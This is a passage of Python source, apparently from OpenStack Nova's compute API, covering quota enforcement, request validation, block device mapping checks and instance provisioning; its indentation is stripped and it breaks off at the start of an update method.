def _check_injected_file_quota(self, context, injected_files):
"""Enforce quota limits on injected files.
Raises a QuotaError if any limit is exceeded.
"""
if injected_files is None:
return
# Check number of files first
try:
QUOTAS.limit_check(context, injected_files=len(injected_files))
except exception.OverQuota:
raise exception.OnsetFileLimitExceeded()
# OK, now count path and content lengths; we're looking for
# the max...
max_path = 0
max_content = 0
for path, content in injected_files:
max_path = max(max_path, len(path))
max_content = max(max_content, len(content))
try:
QUOTAS.limit_check(context, injected_file_path_bytes=max_path,
injected_file_content_bytes=max_content)
except exception.OverQuota as exc:
# Favor path limit over content limit for reporting
# purposes
if 'injected_file_path_bytes' in exc.kwargs['overs']:
raise exception.OnsetFilePathLimitExceeded()
else:
raise exception.OnsetFileContentLimitExceeded()
def _check_num_instances_quota(self, context, instance_type, min_count,
max_count):
"""Enforce quota limits on number of instances created."""
# Determine requested cores and ram
req_cores = max_count * instance_type['vcpus']
vram_mb = int(instance_type.get('extra_specs', {}).get(VIDEO_RAM, 0))
req_ram = max_count * (instance_type['memory_mb'] + vram_mb)
# Check the quota
try:
quotas = objects.Quotas(context)
quotas.reserve(context, instances=max_count,
cores=req_cores, ram=req_ram)
except exception.OverQuota as exc:
# OK, we exceeded quota; let's figure out why...
quotas = exc.kwargs['quotas']
overs = exc.kwargs['overs']
headroom = exc.kwargs['headroom']
allowed = headroom['instances']
# Reduce 'allowed' instances in line with the cores & ram headroom
if instance_type['vcpus']:
allowed = min(allowed,
headroom['cores'] // instance_type['vcpus'])
if instance_type['memory_mb']:
allowed = min(allowed,
headroom['ram'] // (instance_type['memory_mb'] +
vram_mb))
# Convert to the appropriate exception message
if allowed <= 0:
msg = _("Cannot run any more instances of this type.")
allowed = 0
elif min_count <= allowed <= max_count:
# We're actually OK, but still need reservations
return self._check_num_instances_quota(context, instance_type,
min_count, allowed)
else:
msg = (_("Can only run %s more instances of this type.") %
allowed)
resource = overs[0]
used = quotas[resource] - headroom[resource]
total_allowed = quotas[resource]
overs = ','.join(overs)
params = {'overs': overs, 'pid': context.project_id,
'min_count': min_count, 'max_count': max_count,
'msg': msg}
if min_count == max_count:
LOG.warn(_("%(overs)s quota exceeded for %(pid)s,"
" tried to run %(min_count)d instances. %(msg)s"),
params)
else:
LOG.warn(_("%(overs)s quota exceeded for %(pid)s,"
" tried to run between %(min_count)d and"
" %(max_count)d instances. %(msg)s"),
params)
num_instances = (str(min_count) if min_count == max_count else
"%s-%s" % (min_count, max_count))
requested = dict(instances=num_instances, cores=req_cores,
ram=req_ram)
raise exception.TooManyInstances(overs=overs,
req=requested[resource],
used=used, allowed=total_allowed,
resource=resource)
return max_count, quotas
def _check_metadata_properties_quota(self, context, metadata=None):
"""Enforce quota limits on metadata properties."""
if not metadata:
metadata = {}
if not isinstance(metadata, dict):
msg = (_("Metadata type should be dict."))
raise exception.InvalidMetadata(reason=msg)
num_metadata = len(metadata)
try:
QUOTAS.limit_check(context, metadata_items=num_metadata)
except exception.OverQuota as exc:
quota_metadata = exc.kwargs['quotas']['metadata_items']
raise exception.MetadataLimitExceeded(allowed=quota_metadata)
# Because metadata is stored in the DB, we hard-code the size limits
# In future, we may support more variable length strings, so we act
# as if this is quota-controlled for forwards compatibility
for k, v in metadata.iteritems():
try:
utils.check_string_length(v)
utils.check_string_length(k, min_length=1)
except exception.InvalidInput as e:
raise exception.InvalidMetadata(reason=e.format_message())
# For backward compatible we need raise HTTPRequestEntityTooLarge
# so we need to keep InvalidMetadataSize exception here
if len(k) > 255:
msg = _("Metadata property key greater than 255 characters")
raise exception.InvalidMetadataSize(reason=msg)
if len(v) > 255:
msg = _("Metadata property value greater than 255 characters")
raise exception.InvalidMetadataSize(reason=msg)
def _check_requested_secgroups(self, context, secgroups):
"""Check if the security group requested exists and belongs to
the project.
"""
for secgroup in secgroups:
# NOTE(sdague): default is handled special
if secgroup == "default":
continue
if not self.security_group_api.get(context, secgroup):
raise exception.SecurityGroupNotFoundForProject(
project_id=context.project_id, security_group_id=secgroup)
def _check_requested_networks(self, context, requested_networks,
max_count):
"""Check if the networks requested belongs to the project
and the fixed IP address for each network provided is within
same the network block
"""
if requested_networks is not None:
# NOTE(danms): Temporary transition
requested_networks = requested_networks.as_tuples()
return self.network_api.validate_networks(context, requested_networks,
max_count)
def _handle_kernel_and_ramdisk(self, context, kernel_id, ramdisk_id,
image):
"""Choose kernel and ramdisk appropriate for the instance.
The kernel and ramdisk can be chosen in one of three ways:
1. Passed in with create-instance request.
2. Inherited from image.
3. Forced to None by using `null_kernel` FLAG.
"""
# Inherit from image if not specified
image_properties = image.get('properties', {})
if kernel_id is None:
kernel_id = image_properties.get('kernel_id')
if ramdisk_id is None:
ramdisk_id = image_properties.get('ramdisk_id')
# Force to None if using null_kernel
if kernel_id == str(CONF.null_kernel):
kernel_id = None
ramdisk_id = None
# Verify kernel and ramdisk exist (fail-fast)
if kernel_id is not None:
kernel_image = self.image_api.get(context, kernel_id)
# kernel_id could have been a URI, not a UUID, so to keep behaviour
# from before, which leaked that implementation detail out to the
# caller, we return the image UUID of the kernel image and ramdisk
# image (below) and not any image URIs that might have been
# supplied.
# TODO(jaypipes): Get rid of this silliness once we move to a real
# Image object and hide all of that stuff within nova.image.api.
kernel_id = kernel_image['id']
if ramdisk_id is not None:
ramdisk_image = self.image_api.get(context, ramdisk_id)
ramdisk_id = ramdisk_image['id']
return kernel_id, ramdisk_id
@staticmethod
def _handle_availability_zone(context, availability_zone):
# NOTE(vish): We have a legacy hack to allow admins to specify hosts
# via az using az:host:node. It might be nice to expose an
# api to specify specific hosts to force onto, but for
# now it just supports this legacy hack.
# NOTE(deva): It is also possible to specify az::node, in which case
# the host manager will determine the correct host.
forced_host = None
forced_node = None
if availability_zone and ':' in availability_zone:
c = availability_zone.count(':')
if c == 1:
availability_zone, forced_host = availability_zone.split(':')
elif c == 2:
if '::' in availability_zone:
availability_zone, forced_node = \
availability_zone.split('::')
else:
availability_zone, forced_host, forced_node = \
availability_zone.split(':')
else:
raise exception.InvalidInput(
reason="Unable to parse availability_zone")
if not availability_zone:
availability_zone = CONF.default_schedule_zone
if forced_host:
check_policy(context, 'create:forced_host', {})
if forced_node:
check_policy(context, 'create:forced_host', {})
return availability_zone, forced_host, forced_node
def _ensure_auto_disk_config_is_valid(self, auto_disk_config_img,
auto_disk_config, image):
auto_disk_config_disabled = \
utils.is_auto_disk_config_disabled(auto_disk_config_img)
if auto_disk_config_disabled and auto_disk_config:
raise exception.AutoDiskConfigDisabledByImage(image=image)
def _inherit_properties_from_image(self, image, auto_disk_config):
image_properties = image.get('properties', {})
auto_disk_config_img = \
utils.get_auto_disk_config_from_image_props(image_properties)
self._ensure_auto_disk_config_is_valid(auto_disk_config_img,
auto_disk_config,
image.get("id"))
if auto_disk_config is None:
auto_disk_config = strutils.bool_from_string(auto_disk_config_img)
return {
'os_type': image_properties.get('os_type'),
'architecture': image_properties.get('architecture'),
'vm_mode': image_properties.get('vm_mode'),
'auto_disk_config': auto_disk_config
}
def _apply_instance_name_template(self, context, instance, index):
params = {
'uuid': instance['uuid'],
'name': instance['display_name'],
'count': index + 1,
}
try:
new_name = (CONF.multi_instance_display_name_template %
params)
except (KeyError, TypeError):
LOG.exception(_LE('Failed to set instance name using '
'multi_instance_display_name_template.'))
new_name = instance['display_name']
instance.display_name = new_name
if not instance.get('hostname', None):
instance.hostname = utils.sanitize_hostname(new_name)
instance.save()
return instance
def _check_config_drive(self, config_drive):
if config_drive:
try:
bool_val = strutils.bool_from_string(config_drive,
strict=True)
except ValueError:
raise exception.ConfigDriveInvalidValue(option=config_drive)
else:
bool_val = False
# FIXME(comstud): Bug ID 1193438 filed for this. This looks silly,
# but this is because the config drive column is a String. False
# is represented by using an empty string. And for whatever
# reason, we rely on the DB to cast True to a String.
return True if bool_val else ''
def _check_requested_image(self, context, image_id, image, instance_type):
if not image:
return
if image['status'] != 'active':
raise exception.ImageNotActive(image_id=image_id)
image_properties = image.get('properties', {})
config_drive_option = image_properties.get(
'img_config_drive', 'optional')
if config_drive_option not in ['optional', 'mandatory']:
raise exception.InvalidImageConfigDrive(
config_drive=config_drive_option)
if instance_type['memory_mb'] < int(image.get('min_ram') or 0):
raise exception.FlavorMemoryTooSmall()
# NOTE(johannes): root_gb is allowed to be 0 for legacy reasons
# since libvirt interpreted the value differently than other
# drivers. A value of 0 means don't check size.
root_gb = instance_type['root_gb']
if root_gb:
if int(image.get('size') or 0) > root_gb * (1024 ** 3):
raise exception.FlavorDiskTooSmall()
if int(image.get('min_disk') or 0) > root_gb:
raise exception.FlavorDiskTooSmall()
def _get_image_defined_bdms(self, base_options, instance_type, image_meta,
root_device_name):
image_properties = image_meta.get('properties', {})
# Get the block device mappings defined by the image.
image_defined_bdms = image_properties.get('block_device_mapping', [])
legacy_image_defined = not image_properties.get('bdm_v2', False)
image_mapping = image_properties.get('mappings', [])
if legacy_image_defined:
image_defined_bdms = block_device.from_legacy_mapping(
image_defined_bdms, None, root_device_name)
else:
image_defined_bdms = map(block_device.BlockDeviceDict,
image_defined_bdms)
if image_mapping:
image_defined_bdms += self._prepare_image_mapping(
instance_type, image_mapping)
return image_defined_bdms
def _check_and_transform_bdm(self, base_options, instance_type, image_meta,
min_count, max_count, block_device_mapping,
legacy_bdm):
# NOTE (ndipanov): Assume root dev name is 'vda' if not supplied.
# It's needed for legacy conversion to work.
root_device_name = (base_options.get('root_device_name') or 'vda')
image_ref = base_options.get('image_ref', '')
image_defined_bdms = self._get_image_defined_bdms(
base_options, instance_type, image_meta, root_device_name)
root_in_image_bdms = (
block_device.get_root_bdm(image_defined_bdms) is not None)
if legacy_bdm:
block_device_mapping = block_device.from_legacy_mapping(
block_device_mapping, image_ref, root_device_name,
no_root=root_in_image_bdms)
elif image_ref and root_in_image_bdms:
# NOTE (ndipanov): client will insert an image mapping into the v2
# block_device_mapping, but if there is a bootable device in image
# mappings - we need to get rid of the inserted image.
def not_image_and_root_bdm(bdm):
return not (bdm.get('boot_index') == 0 and
bdm.get('source_type') == 'image')
block_device_mapping = (
filter(not_image_and_root_bdm, block_device_mapping))
block_device_mapping += image_defined_bdms
if min_count > 1 or max_count > 1:
if any(map(lambda bdm: bdm['source_type'] == 'volume',
block_device_mapping)):
msg = _('Cannot attach one or more volumes to multiple'
' instances')
raise exception.InvalidRequest(msg)
return block_device_mapping
def _get_image(self, context, image_href):
if not image_href:
return None, {}
image = self.image_api.get(context, image_href)
return image['id'], image
def _checks_for_create_and_rebuild(self, context, image_id, image,
instance_type, metadata,
files_to_inject):
self._check_metadata_properties_quota(context, metadata)
self._check_injected_file_quota(context, files_to_inject)
self._check_requested_image(context, image_id, image, instance_type)
def _validate_and_build_base_options(self, context, instance_type,
boot_meta, image_href, image_id,
kernel_id, ramdisk_id, display_name,
display_description, key_name,
key_data, security_groups,
availability_zone, forced_host,
user_data, metadata, injected_files,
access_ip_v4, access_ip_v6,
requested_networks, config_drive,
block_device_mapping,
auto_disk_config, reservation_id,
max_count):
"""Verify all the input parameters regardless of the provisioning
strategy being performed.
"""
if availability_zone:
available_zones = availability_zones.\
get_availability_zones(context.elevated(), True)
if forced_host is None and availability_zone not in \
available_zones:
msg = _('The requested availability zone is not available')
raise exception.InvalidRequest(msg)
if instance_type['disabled']:
raise exception.FlavorNotFound(flavor_id=instance_type['id'])
if user_data:
l = len(user_data)
if l > MAX_USERDATA_SIZE:
# NOTE(mikal): user_data is stored in a text column, and
# the database might silently truncate if its over length.
raise exception.InstanceUserDataTooLarge(
length=l, maxsize=MAX_USERDATA_SIZE)
try:
base64.decodestring(user_data)
except base64.binascii.Error:
raise exception.InstanceUserDataMalformed()
self._checks_for_create_and_rebuild(context, image_id, boot_meta,
instance_type, metadata, injected_files)
self._check_requested_secgroups(context, security_groups)
# Note: max_count is the number of instances requested by the user,
# max_network_count is the maximum number of instances taking into
# account any network quotas
max_network_count = self._check_requested_networks(context,
requested_networks, max_count)
kernel_id, ramdisk_id = self._handle_kernel_and_ramdisk(
context, kernel_id, ramdisk_id, boot_meta)
config_drive = self._check_config_drive(config_drive)
if key_data is None and key_name:
key_pair = objects.KeyPair.get_by_name(context,
context.user_id,
key_name)
key_data = key_pair.public_key
root_device_name = block_device.prepend_dev(
block_device.properties_root_device_name(
boot_meta.get('properties', {})))
numa_topology = hardware.VirtNUMAInstanceTopology.get_constraints(
instance_type, boot_meta.get('properties', {}))
if numa_topology is not None:
numa_topology = objects.InstanceNUMATopology.obj_from_topology(
numa_topology)
system_metadata = flavors.save_flavor_info(
dict(), instance_type)
# PCI requests come from two sources: instance flavor and
# requested_networks. The first call in below returns an
# InstancePCIRequests object which is a list of InstancePCIRequest
# objects. The second call in below creates an InstancePCIRequest
# object for each SR-IOV port, and append it to the list in the
# InstancePCIRequests object
pci_request_info = pci_request.get_pci_requests_from_flavor(
instance_type)
self.network_api.create_pci_requests_for_sriov_ports(context,
pci_request_info, requested_networks)
base_options = {
'reservation_id': reservation_id,
'image_ref': image_href,
'kernel_id': kernel_id or '',
'ramdisk_id': ramdisk_id or '',
'power_state': power_state.NOSTATE,
'vm_state': vm_states.BUILDING,
'config_drive': config_drive,
'user_id': context.user_id,
'project_id': context.project_id,
'instance_type_id': instance_type['id'],
'memory_mb': instance_type['memory_mb'],
'vcpus': instance_type['vcpus'],
'root_gb': instance_type['root_gb'],
'ephemeral_gb': instance_type['ephemeral_gb'],
'display_name': display_name,
'display_description': display_description or '',
'user_data': user_data,
'key_name': key_name,
'key_data': key_data,
'locked': False,
'metadata': metadata or {},
'access_ip_v4': access_ip_v4,
'access_ip_v6': access_ip_v6,
'availability_zone': availability_zone,
'root_device_name': root_device_name,
'progress': 0,
'pci_request_info': pci_request_info,
'numa_topology': numa_topology,
'system_metadata': system_metadata}
options_from_image = self._inherit_properties_from_image(
boot_meta, auto_disk_config)
base_options.update(options_from_image)
# return the validated options and maximum number of instances allowed
# by the network quotas
return base_options, max_network_count
def _build_filter_properties(self, context, scheduler_hints, forced_host,
forced_node, instance_type, pci_request_info):
filter_properties = dict(scheduler_hints=scheduler_hints)
filter_properties['instance_type'] = instance_type
if forced_host:
filter_properties['force_hosts'] = [forced_host]
if forced_node:
filter_properties['force_nodes'] = [forced_node]
if pci_request_info and pci_request_info.requests:
filter_properties['pci_requests'] = pci_request_info
return filter_properties
def _provision_instances(self, context, instance_type, min_count,
max_count, base_options, boot_meta, security_groups,
block_device_mapping, shutdown_terminate,
instance_group, check_server_group_quota):
# Reserve quotas
num_instances, quotas = self._check_num_instances_quota(
context, instance_type, min_count, max_count)
LOG.debug("Going to run %s instances..." % num_instances)
instances = []
try:
for i in xrange(num_instances):
instance = objects.Instance()
instance.update(base_options)
instance = self.create_db_entry_for_new_instance(
context, instance_type, boot_meta, instance,
security_groups, block_device_mapping,
num_instances, i, shutdown_terminate)
pci_requests = base_options['pci_request_info']
pci_requests.instance_uuid = instance.uuid
pci_requests.save(context)
instances.append(instance)
if instance_group:
if check_server_group_quota:
count = QUOTAS.count(context,
'server_group_members',
instance_group,
context.user_id)
try:
QUOTAS.limit_check(context,
server_group_members=count + 1)
except exception.OverQuota:
msg = _("Quota exceeded, too many servers in "
"group")
raise exception.QuotaError(msg)
objects.InstanceGroup.add_members(context,
instance_group.uuid,
[instance.uuid])
# send a state update notification for the initial create to
# show it going from non-existent to BUILDING
notifications.send_update_with_states(context, instance, None,
vm_states.BUILDING, None, None, service="api")
# In the case of any exceptions, attempt DB cleanup and rollback the
# quota reservations.
except Exception:
with excutils.save_and_reraise_exception():
try:
for instance in instances:
try:
instance.destroy()
except exception.ObjectActionError:
pass
finally:
quotas.rollback()
# Commit the reservations
quotas.commit()
return instances
def _get_bdm_image_metadata(self, context, block_device_mapping,
legacy_bdm=True):
"""If we are booting from a volume, we need to get the
volume details from Cinder and make sure we pass the
metadata back accordingly.
"""
if not block_device_mapping:
return {}
for bdm in block_device_mapping:
if (legacy_bdm and
block_device.get_device_letter(
bdm.get('device_name', '')) != 'a'):
continue
elif not legacy_bdm and bdm.get('boot_index') != 0:
continue
if bdm.get('image_id'):
try:
image_id = bdm['image_id']
image_meta = self.image_api.get(context, image_id)
return image_meta
except Exception:
raise exception.InvalidBDMImage(id=image_id)
elif bdm.get('volume_id'):
try:
volume_id = bdm['volume_id']
volume = self.volume_api.get(context, volume_id)
except exception.CinderConnectionFailed:
raise
except Exception:
raise exception.InvalidBDMVolume(id=volume_id)
if not volume.get('bootable', True):
raise exception.InvalidBDMVolumeNotBootable(id=volume_id)
properties = volume.get('volume_image_metadata', {})
image_meta = {'properties': properties}
# NOTE(yjiang5): restore the basic attributes
image_meta['min_ram'] = properties.get('min_ram', 0)
image_meta['min_disk'] = properties.get('min_disk', 0)
image_meta['size'] = properties.get('size', 0)
# NOTE(yjiang5): Always set the image status as 'active'
# and depends on followed volume_api.check_attach() to
# verify it. This hack should be harmless with that check.
image_meta['status'] = 'active'
return image_meta
return {}
@staticmethod
def _get_requested_instance_group(context, scheduler_hints,
check_quota):
if not scheduler_hints:
return
group_hint = scheduler_hints.get('group')
if not group_hint:
return
if uuidutils.is_uuid_like(group_hint):
group = objects.InstanceGroup.get_by_uuid(context, group_hint)
else:
try:
group = objects.InstanceGroup.get_by_name(context, group_hint)
except exception.InstanceGroupNotFound:
# NOTE(russellb) If the group does not already exist, we need
# to automatically create it to be backwards compatible with
# old handling of the 'group' scheduler hint. The policy type
# will be 'legacy', indicating that this group was created to
# emulate legacy group behavior.
quotas = None
if check_quota:
quotas = objects.Quotas()
try:
quotas.reserve(context,
project_id=context.project_id,
user_id=context.user_id,
server_groups=1)
except nova.exception.OverQuota:
msg = _("Quota exceeded, too many server groups.")
raise nova.exception.QuotaError(msg)
group = objects.InstanceGroup(context)
group.name = group_hint
group.project_id = context.project_id
group.user_id = context.user_id
group.policies = ['legacy']
try:
group.create()
except Exception:
with excutils.save_and_reraise_exception():
if quotas:
quotas.rollback()
if quotas:
quotas.commit()
return group
def _create_instance(self, context, instance_type,
image_href, kernel_id, ramdisk_id,
min_count, max_count,
display_name, display_description,
key_name, key_data, security_groups,
availability_zone, user_data, metadata,
injected_files, admin_password,
access_ip_v4, access_ip_v6,
requested_networks, config_drive,
block_device_mapping, auto_disk_config,
reservation_id=None, scheduler_hints=None,
legacy_bdm=True, shutdown_terminate=False,
check_server_group_quota=False):
"""Verify all the input parameters regardless of the provisioning
strategy being performed and schedule the instance(s) for
creation.
"""
# Normalize and setup some parameters
if reservation_id is None:
reservation_id = utils.generate_uid('r')
security_groups = security_groups or ['default']
min_count = min_count or 1
max_count = max_count or min_count
block_device_mapping = block_device_mapping or []
if not instance_type:
instance_type = flavors.get_default_flavor()
if image_href:
image_id, boot_meta = self._get_image(context, image_href)
else:
image_id = None
boot_meta = self._get_bdm_image_metadata(
context, block_device_mapping, legacy_bdm)
self._check_auto_disk_config(image=boot_meta,
auto_disk_config=auto_disk_config)
handle_az = self._handle_availability_zone
availability_zone, forced_host, forced_node = handle_az(context,
availability_zone)
base_options, max_net_count = self._validate_and_build_base_options(
context,
instance_type, boot_meta, image_href, image_id, kernel_id,
ramdisk_id, display_name, display_description,
key_name, key_data, security_groups, availability_zone,
forced_host, user_data, metadata, injected_files, access_ip_v4,
access_ip_v6, requested_networks, config_drive,
block_device_mapping, auto_disk_config, reservation_id,
max_count)
# max_net_count is the maximum number of instances requested by the
# user adjusted for any network quota constraints, including
# considertaion of connections to each requested network
if max_net_count == 0:
raise exception.PortLimitExceeded()
elif max_net_count < max_count:
LOG.debug("max count reduced from %(max_count)d to "
"%(max_net_count)d due to network port quota",
{'max_count': max_count,
'max_net_count': max_net_count})
max_count = max_net_count
block_device_mapping = self._check_and_transform_bdm(
base_options, instance_type, boot_meta, min_count, max_count,
block_device_mapping, legacy_bdm)
instance_group = self._get_requested_instance_group(context,
scheduler_hints, check_server_group_quota)
instances = self._provision_instances(context, instance_type,
min_count, max_count, base_options, boot_meta, security_groups,
block_device_mapping, shutdown_terminate,
instance_group, check_server_group_quota)
filter_properties = self._build_filter_properties(context,
scheduler_hints, forced_host,
forced_node, instance_type,
base_options.get('pci_request_info'))
for instance in instances:
self._record_action_start(context, instance,
instance_actions.CREATE)
self.compute_task_api.build_instances(context,
instances=instances, image=boot_meta,
filter_properties=filter_properties,
admin_password=admin_password,
injected_files=injected_files,
requested_networks=requested_networks,
security_groups=security_groups,
block_device_mapping=block_device_mapping,
legacy_bdm=False)
return (instances, reservation_id)
@staticmethod
def _volume_size(instance_type, bdm):
size = bdm.get('volume_size')
if size is None and bdm.get('source_type') == 'blank':
if bdm.get('guest_format') == 'swap':
size = instance_type.get('swap', 0)
else:
size = instance_type.get('ephemeral_gb', 0)
return size
def _prepare_image_mapping(self, instance_type, mappings):
"""Extract and format blank devices from image mappings."""
prepared_mappings = []
for bdm in block_device.mappings_prepend_dev(mappings):
LOG.debug("Image bdm %s", bdm)
virtual_name = bdm['virtual']
if virtual_name == 'ami' or virtual_name == 'root':
continue
if not block_device.is_swap_or_ephemeral(virtual_name):
continue
guest_format = bdm.get('guest_format')
if virtual_name == 'swap':
guest_format = 'swap'
if not guest_format:
guest_format = CONF.default_ephemeral_format
values = block_device.BlockDeviceDict({
'device_name': bdm['device'],
'source_type': 'blank',
'destination_type': 'local',
'device_type': 'disk',
'guest_format': guest_format,
'delete_on_termination': True,
'boot_index': -1})
values['volume_size'] = self._volume_size(
instance_type, values)
if values['volume_size'] == 0:
continue
prepared_mappings.append(values)
return prepared_mappings
def _update_block_device_mapping(self, elevated_context,
instance_type, instance_uuid,
block_device_mapping):
"""tell vm driver to attach volume at boot time by updating
BlockDeviceMapping
"""
LOG.debug("block_device_mapping %s", block_device_mapping,
instance_uuid=instance_uuid)
for bdm in block_device_mapping:
bdm['volume_size'] = self._volume_size(instance_type, bdm)
if bdm.get('volume_size') == 0:
continue
bdm['instance_uuid'] = instance_uuid
self.db.block_device_mapping_update_or_create(elevated_context,
bdm,
legacy=False)
def _validate_bdm(self, context, instance, instance_type, all_mappings):
def _subsequent_list(l):
return all(el + 1 == l[i + 1] for i, el in enumerate(l[:-1]))
# Make sure that the boot indexes make sense
boot_indexes = sorted([bdm['boot_index']
for bdm in all_mappings
if bdm.get('boot_index') is not None
and bdm.get('boot_index') >= 0])
if 0 not in boot_indexes or not _subsequent_list(boot_indexes):
raise exception.InvalidBDMBootSequence()
for bdm in all_mappings:
# NOTE(vish): For now, just make sure the volumes are accessible.
# Additionally, check that the volume can be attached to this
# instance.
snapshot_id = bdm.get('snapshot_id')
volume_id = bdm.get('volume_id')
image_id = bdm.get('image_id')
if (image_id is not None and
image_id != instance.get('image_ref')):
try:
self._get_image(context, image_id)
except Exception:
raise exception.InvalidBDMImage(id=image_id)
if (bdm['source_type'] == 'image' and
bdm['destination_type'] == 'volume' and
not bdm['volume_size']):
raise exception.InvalidBDM(message=_("Images with "
"destination_type 'volume' need to have a non-zero "
"size specified"))
elif volume_id is not None:
try:
volume = self.volume_api.get(context, volume_id)
self.volume_api.check_attach(context,
volume,
instance=instance)
except (exception.CinderConnectionFailed,
exception.InvalidVolume):
raise
except Exception:
raise exception.InvalidBDMVolume(id=volume_id)
elif snapshot_id is not None:
try:
self.volume_api.get_snapshot(context, snapshot_id)
except exception.CinderConnectionFailed:
raise
except Exception:
raise exception.InvalidBDMSnapshot(id=snapshot_id)
ephemeral_size = sum(bdm.get('volume_size') or 0
for bdm in all_mappings
if block_device.new_format_is_ephemeral(bdm))
if ephemeral_size > instance_type['ephemeral_gb']:
raise exception.InvalidBDMEphemeralSize()
# There should be only one swap
swap_list = [bdm for bdm in all_mappings
if block_device.new_format_is_swap(bdm)]
if len(swap_list) > 1:
msg = _("More than one swap drive requested.")
raise exception.InvalidBDMFormat(details=msg)
if swap_list:
swap_size = swap_list[0].get('volume_size') or 0
if swap_size > instance_type['swap']:
raise exception.InvalidBDMSwapSize()
max_local = CONF.max_local_block_devices
if max_local >= 0:
num_local = len([bdm for bdm in all_mappings
if bdm.get('destination_type') == 'local'])
if num_local > max_local:
raise exception.InvalidBDMLocalsLimit()
def _populate_instance_names(self, instance, num_instances):
"""Populate instance display_name and hostname."""
display_name = instance.get('display_name')
if instance.obj_attr_is_set('hostname'):
hostname = instance.get('hostname')
else:
hostname = None
if display_name is None:
display_name = self._default_display_name(instance['uuid'])
instance.display_name = display_name
if hostname is None and num_instances == 1:
# NOTE(russellb) In the multi-instance case, we're going to
# overwrite the display_name using the
# multi_instance_display_name_template. We need the default
# display_name set so that it can be used in the template, though.
# Only set the hostname here if we're only creating one instance.
# Otherwise, it will be built after the template based
# display_name.
hostname = display_name
instance.hostname = utils.sanitize_hostname(hostname)
def _default_display_name(self, instance_uuid):
return "Server %s" % instance_uuid
def _populate_instance_for_create(self, context, instance, image,
index, security_groups, instance_type):
"""Build the beginning of a new instance."""
if not instance.obj_attr_is_set('uuid'):
# Generate the instance_uuid here so we can use it
# for additional setup before creating the DB entry.
instance['uuid'] = str(uuid.uuid4())
instance.launch_index = index
instance.vm_state = vm_states.BUILDING
instance.task_state = task_states.SCHEDULING
info_cache = objects.InstanceInfoCache()
info_cache.instance_uuid = instance.uuid
info_cache.network_info = network_model.NetworkInfo()
instance.info_cache = info_cache
if CONF.ephemeral_storage_encryption.enabled:
instance.ephemeral_key_uuid = self.key_manager.create_key(
context,
length=CONF.ephemeral_storage_encryption.key_size)
else:
instance.ephemeral_key_uuid = None
# Store image properties so we can use them later
# (for notifications, etc). Only store what we can.
if not instance.obj_attr_is_set('system_metadata'):
instance.system_metadata = {}
# Make sure we have the dict form that we need for instance_update.
instance['system_metadata'] = utils.instance_sys_meta(instance)
system_meta = utils.get_system_metadata_from_image(
image, instance_type)
# In case we couldn't find any suitable base_image
system_meta.setdefault('image_base_image_ref', instance['image_ref'])
instance['system_metadata'].update(system_meta)
self.security_group_api.populate_security_groups(instance,
security_groups)
return instance
# NOTE(bcwaldon): No policy check since this is only used by scheduler and
# the compute api. That should probably be cleaned up, though.
def create_db_entry_for_new_instance(self, context, instance_type, image,
instance, security_group, block_device_mapping, num_instances,
index, shutdown_terminate=False):
"""Create an entry in the DB for this new instance,
including any related table updates (such as security group,
etc).
This is called by the scheduler after a location for the
instance has been determined.
"""
self._populate_instance_for_create(context, instance, image, index,
security_group, instance_type)
self._populate_instance_names(instance, num_instances)
instance.shutdown_terminate = shutdown_terminate
self.security_group_api.ensure_default(context)
instance.create(context)
if num_instances > 1:
# NOTE(russellb) We wait until this spot to handle
# multi_instance_display_name_template, because we need
# the UUID from the instance.
instance = self._apply_instance_name_template(context, instance,
index)
# NOTE (ndipanov): This can now raise exceptions but the instance
# has been created, so delete it and re-raise so
# that other cleanup can happen.
try:
self._validate_bdm(
context, instance, instance_type, block_device_mapping)
except (exception.CinderConnectionFailed, exception.InvalidBDM,
exception.InvalidVolume):
with excutils.save_and_reraise_exception():
instance.destroy(context)
self._update_block_device_mapping(
context, instance_type, instance['uuid'], block_device_mapping)
return instance
def _check_create_policies(self, context, availability_zone,
requested_networks, block_device_mapping):
"""Check policies for create()."""
target = {'project_id': context.project_id,
'user_id': context.user_id,
'availability_zone': availability_zone}
check_policy(context, 'create', target)
if requested_networks and len(requested_networks):
check_policy(context, 'create:attach_network', target)
if block_device_mapping:
check_policy(context, 'create:attach_volume', target)
def _check_multiple_instances_neutron_ports(self, requested_networks):
"""Check whether multiple instances are created from port id(s)."""
for requested_net in requested_networks:
if requested_net.port_id:
msg = _("Unable to launch multiple instances with"
" a single configured port ID. Please launch your"
" instance one by one with different ports.")
raise exception.MultiplePortsNotApplicable(reason=msg)
def _check_multiple_instances_and_specified_ip(self, requested_networks):
"""Check whether multiple instances are created with specified ip."""
for requested_net in requested_networks:
if requested_net.network_id and requested_net.address:
msg = _("max_count cannot be greater than 1 if an fixed_ip "
"is specified.")
raise exception.InvalidFixedIpAndMaxCountRequest(reason=msg)
@hooks.add_hook("create_instance")
def create(self, context, instance_type,
image_href, kernel_id=None, ramdisk_id=None,
min_count=None, max_count=None,
display_name=None, display_description=None,
key_name=None, key_data=None, security_group=None,
availability_zone=None, user_data=None, metadata=None,
injected_files=None, admin_password=None,
block_device_mapping=None, access_ip_v4=None,
access_ip_v6=None, requested_networks=None, config_drive=None,
auto_disk_config=None, scheduler_hints=None, legacy_bdm=True,
shutdown_terminate=False, check_server_group_quota=False):
"""Provision instances, sending instance information to the
scheduler. The scheduler will determine where the instance(s)
go and will handle creating the DB entries.
Returns a tuple of (instances, reservation_id)
"""
self._check_create_policies(context, availability_zone,
requested_networks, block_device_mapping)
if requested_networks and max_count > 1:
self._check_multiple_instances_and_specified_ip(requested_networks)
if utils.is_neutron():
self._check_multiple_instances_neutron_ports(
requested_networks)
return self._create_instance(
context, instance_type,
image_href, kernel_id, ramdisk_id,
min_count, max_count,
display_name, display_description,
key_name, key_data, security_group,
availability_zone, user_data, metadata,
injected_files, admin_password,
access_ip_v4, access_ip_v6,
requested_networks, config_drive,
block_device_mapping, auto_disk_config,
scheduler_hints=scheduler_hints,
legacy_bdm=legacy_bdm,
shutdown_terminate=shutdown_terminate,
check_server_group_quota=check_server_group_quota)
def trigger_provider_fw_rules_refresh(self, context):
"""Called when a rule is added/removed from a provider firewall."""
services = objects.ServiceList.get_all_by_topic(context,
CONF.compute_topic)
for service in services:
host_name = service.host
self.compute_rpcapi.refresh_provider_fw_rules(context, host_name)
@wrap_check_policy
def update(self, context, instance, **kwargs):
"""Updates the instance in the datastore.
:param context: The security context
:param instance: The instance to update
:param kwargs: All additional keyword args are treated
as data fields of the instance to be
updated
:returns: A reference to the updated instance
"""
refs = self._update(context, instance, **kwargs)
return refs[1]
def _update(self, context, instance, **kwargs):
# Update the instance record and send a state update notification
# if task or vm state changed
